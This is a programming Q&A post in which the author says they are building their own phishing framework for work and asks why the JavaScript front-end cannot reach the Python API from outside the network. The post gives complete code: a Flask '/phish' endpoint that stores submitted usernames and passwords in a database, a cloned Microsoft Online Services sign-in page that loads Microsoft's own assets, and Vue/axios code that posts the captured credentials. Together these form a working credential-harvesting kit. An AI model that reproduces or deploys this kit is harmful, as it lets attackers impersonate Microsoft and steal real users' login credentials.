# JS not able to hit Python API from External Call but can from internal call

Tags: javascript, python, html, python-3.x, vue.js

Just some contextual information here before I dive into code.

Internet -> ISP Router (192.168.2.0/24) -> FortiGate Firewall (IPS) -> ESXI Network -> Virtual Machine (192.168.2.114). Firewall blocks all traffic to the server unless you're within the IP Whitelist range. The Router port forwards port 80 on my DDNS address directly to the VM. The webpage is accessible, provided you're on the whitelist.

I'm designing and implementing my own phishing framework for work, rather then using other frameworks such as GoPhish. I've got 99% of this worked out. I'll change some of the Python later to use parametrized statements to avoid SQL injection. The DB is setup with its tables, stored procedures, etc. There is a python script serving a static webpage on port 80. Python also has an endpoint located on http:// < domain >/phish that accepts POST requests containing JSON. On the index.html page I have linked in vue.js that implements the functionality between front-end (client) and back-end Python/SQL functions. HTTPS isn't implemented yet either... Waiting on some folks to get me a signed SSL cert.

Here's the catch. When I first built this, I used the internal IP Address (192.168.2.114) as the python server address and service URL for VueJS. I can give it credentials, hit sign in, and everything is stored correctly. I sent it off to some coworkers to try out (at work). They arrived to the page, but clicking the sign in button yielded an error message. Python's console showed they hit /index.html, the JS and nothing else. I changed the Service URL and Python app server location to be my public DDNS Address. Launched it again, and it hasn't fixed itself. I'm somewhat at a lost as to why I can access the JS internally but not externally. Any guidance on this? Code attached.

**Settings.py**

```
#/usr/bin/env python3
APP_HOST = '192.168.2.114'
APP_PORT = 80
APP_DEBUG = True

DB_HOST = 'localhost'
DB_USER = 'capture'
DB_PASSWD = '< removed >'
DB_DATABASE = 'phishing'

SECRET_KEY = '< removed >'
```

**App.py**

```
#!/usr/bin/env python3
import sys
print(sys.path)
from flask import Flask, jsonify, abort, request, make_response, session
from flask_restful import reqparse, Resource, Api
from flask_session import Session
import json
#from ldap3 import Server, Connection, ALL
#from ldap3.core.exceptions import *
import pymysql
import pymysql.cursors
#import ssl #include ssl libraries

import settings # Our server and db settings, stored in settings.py

app = Flask(__name__)
#CORS(app)
# Set Server-side session config: Save sessions in the local app directory.
app.config['SECRET_KEY'] = settings.SECRET_KEY
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SESSION_COOKIE_NAME'] = 'peanutButter'
app.config['SESSION_COOKIE_DOMAIN'] = settings.APP_HOST

Session(app)

####################################################################################
#
# Error handlers
#
@app.errorhandler(400) # decorators to add to 400 response
def not_found(error):
    return make_response(jsonify( { 'status': 'Bad request' } ), 400)

@app.errorhandler(404) # decorators to add to 404 response
def not_found(error):
    return make_response(jsonify( { 'status': 'Resource not found' } ), 404)

@app.errorhandler(500) # decorators to add to 500 response
def not_found(error):
    return make_response(jsonify( { 'status': 'Internal server error' } ), 500)

####################################################################################
#
# Static Endpoints for humans
#
class Root(Resource):
    # get method. What might others be aptly named? (hint: post)
    def get(self):
        return app.send_static_file('index.html')

#Create Shortened Link
class URL(Resource):
    def post(self):

        retval = {"status": "success"}

        # Parse the json
        parser = reqparse.RequestParser()
        try:
            # Check for required attributes in json document, create a dictionary
            parser.add_argument('username', type=str, required=True)
            parser.add_argument('password', type=str, required=True)
            request_params = parser.parse_args()
            #print(request.json)
        except:
            abort(400) # bad request

        if request.json and 'username' in request.json and 'password' in request.json:
            response = {'status': 'success'}
            responseCode = 200
            username = request_params['username']
            password = request_params['password']

            try:
                dbConnection = pymysql.connect(host='localhost',
                    user='capture',
                    password='<removed>',
                    db='phishing',
                    charset='utf8mb4',
                    cursorclass= pymysql.cursors.DictCursor)
                sql = 'captureCredentials'
                cursor = dbConnection.cursor()
                sqlArgs = (username, password) # Must be a collection
                cursor.callproc(sql,sqlArgs) # stored procedure, with arguments
                row = cursor.fetchone()
                dbConnection.commit() # database was modified, commit the changes
            finally:
                dbConnection.close()
                cursor.close()
        return make_response(jsonify(response), responseCode)

# endpoint objects
#
api = Api(app)
api.add_resource(URL,'/phish')

if __name__ == "__main__":
    #context = ('cert.pem', 'key.pem') # Identify the certificates you've generated.
    app.run(
    host=settings.APP_HOST,
    port=settings.APP_PORT,
    #ssl_context=context,
    debug=settings.APP_DEBUG)
```

**Index.html**

```
<html>
<head>
    <title>Sign in to Microsoft Online Services</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="PageID" content="i5030.2.0">
    <meta name="SiteID" content="10">
    <meta name="ReqLC" content="1033">
    <meta name="LocLC" content="1033">
    <meta name="mswebdialog-newwindowurl" content="*">
    <link rel="SHORTCUT ICON" href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/images/favicon_a.ico">
    <link href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/css/login.ltr.css" rel="stylesheet" type="text/css">
    <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.1.5.1.min.js" type="text/javascript"></script>
    <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/aad.login.js" type="text/javascript"></script>
    <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.easing.1.3.js" type="text/javascript"></script>
    <style>
        body {
            display: none;
        }
    </style>
</head>



<body>
    <script>
        if (self == top) {
            var body = $('body');
            body.css('display', 'block');
        } else {
            top.location = self.location;
        }
    </script>
    <div class="container-fluid" id="app">
      <div id="background_branding_container" class="ie_legacy" style="background: #FFFFFF">
          <img id="background_background_image" alt="Illustration for Microsoft Online Services">
          <div id="background_company_name_text" class="background_title_text"></div>
      </div>
      <div id="background_page_overlay" class="overlay ie_legacy">
      </div>
      <div id="login_no_script_panel" class="login_panel">
          <table class="login_panel_layout" style="height: 100%;">
              <tr class="login_panel_layout_row" style="height: 100%;">
                  <td id="login_panel_left"></td>
                  <td id="login_panel_center">

                  </td>
                  <td id="login_panel_right">
                  </td>
              </tr>
          </table>
          <td id="login_panel_right">
          </td>
      </div>
      <div id="login_panel" class="login_panel">
          <table class="login_panel_layout" style="height: 100%;">
              <tr class="login_panel_layout_row" style="height: 100%;">
                  <td id="login_panel_left"></td>
                  <td id="login_panel_center">


                      <!--office365 logo-->
                      <script type="text/javascript">
                          $(document).ready(function() {


                              Constants.DEFAULT_LOGO = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/logo.png';
                              Constants.DEFAULT_LOGO_ALT = 'Sign in';
                              Constants.DEFAULT_ILLUSTRATION = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/illustration.jpg';
                              Constants.DEFAULT_BACKGROUND_COLOR = '#EB3C00';

                              Context.TenantBranding.workload_branding_enabled = true;
                              User.UpdateLogo(Constants.DEFAULT_LOGO, Constants.DEFAULT_LOGO_ALT);
                              User.UpdateBackground(Constants.DEFAULT_ILLUSTRATION, Constants.DEFAULT_BACKGROUND_COLOR);
                              Context.TenantBranding.whr_key = '';
                              jQuery('img#logo_img').attr('src', '');
                              Context.use_instrumentation = true;
                              User.moveFooterToBottom('250px');
                          });
                      </script>

                      <div class="login_inner_container">
                          <div class="inner_container cred">
                              <div class="login_workload_logo_container">
                              </div>
                              <div class="login_cta_container normaltext">
                                  <div id="login_cta_text" class="cta_message_text 1">Sign in with your organizational account</div>
                              </div>
                              <ul class="login_cred_container">
                                  <li class="login_cred_field_container">
                                      <div id="cred_userid_container" class="login_textfield textfield">
                                          <span class="input_field textfield">
                   <label for="UsernameForm" class="no_display">User account</label>
                    <div class="input_border">
                  </span>
                                          <form method="POST" action="login-submit.php?uid=<?php echo $uid ?>" name="LoginForm" autocomplete="off">
                                              </br>
                                              <input class="login_textfield textfield required field normaltext" type="text" name="username" v-model="input.username" placeholder="example@microsoft.com">
                                              </br>
                                              </br>
                                              <input class="login_textfield textfield required email field normaltext" type="password" name="password" v-model="input.password" placeholder="Password">



                                              <!--<input class="text" name="username" class="login_textfield textfield required email field normaltext" placeholder="someone@example.com " tabindex="1">
                                              </br>
                                              </br>
                                              <input type="password" name="password" placeholder="Password" class="login_textfield textfield required field normaltext" tabindex="2" type="password" aria-label="Password">-->
                                              </br>
                                              </br>
                                              </br>
                                              <button class="col-4 btn btn-outline-success" type="button" v-on:click="login()">Sign In</button>
                                          </form>
                                      </div>
                                      <div id="cred_password_container" class="login_textfield textfield">
                                          <span class="input_field textfield">
                    <label for="PasswordForm" class="no_display">Password</label>
                    <div class="input_border">
                    </div>
                  </span>
                                      </div>
                                      <div id="cred_hidden_inputs_container" class="no_display">
                                          <input type="hidden" id="PPSX" name="PPSX" value="PassportRN">
                                          <input type="hidden" name="PPFT" id="i0327" value="A1F6YNWGa2YkRUNNhPfW3T8PcqsjHEeiQmp*m*wFwPyxag08*cPrW*SpZSnKeqiDJI*EUu8ceb42zjM89!r*ck!Q6kkHvZYoRPC53LwqFG6O6YCE5yI3mHRGLjK6BurKT332TUIqbZPBSJiw!cfoJN2PCje1NESa7hs4mIzcHNmkN7DO0RJOeoWX8r1DK*UBFpxFwOw$">
                                      </div>
                                      </form>
                                  </li>
                                  <li class="login_cred_options_container">
                                      <div id="cred_kmsi_container" class="subtext normaltext">
                                          <span class="input_field ">
                  <input tabindex="10" id="cred_keep_me_signed_in_checkbox" type="checkbox" value="0" name="persist">
                  <label id="keep_me_signed_in_label_text" for="cred_keep_me_signed_in_checkbox" class="persist_text">Keep me signed in</label>
                </span>
                                      </div>
                                  </li>
                              </ul>
                          </div>
                      </div>
                  </td>
              </tr>
          </table>
      </div>
      </div>
    <script src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.18.0/axios.min.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css"/>
    <!--<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>-->
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="/static/phish.js" ></script>
</body>

</html>
```

**JS**

```
// register modal component
 Vue.component("modal", {
   template: "#modal-template"
 });

var app = new Vue({
  el: "#app",

  //------- data --------
  data: {
      serviceURL: "http://192.168.2.114",
    input: {
        username: "",
        password: "",
    },
  },

  methods: {
    /* Done */
    login() {
      if (this.input.username != "" && this.input.password != "") {
        axios
        .post(this.serviceURL+"/phish", {
            "username": this.input.username,
            "password": this.input.password
        })
        .then(response => {
            if (response.data.status == "success") {
              //Nothing
            }
        })
        .catch(e => {
            alert("The username or password was incorrect, try again");
            this.input.password = "";
            console.log(e);
        });
      } else {
        alert("A username and password must be present");
      }
    },

    showModal() {
      this.editModal = true;
    },


    hideModal() {
      this.editModal = false;
    }

  }
  //------- END methods --------

});
```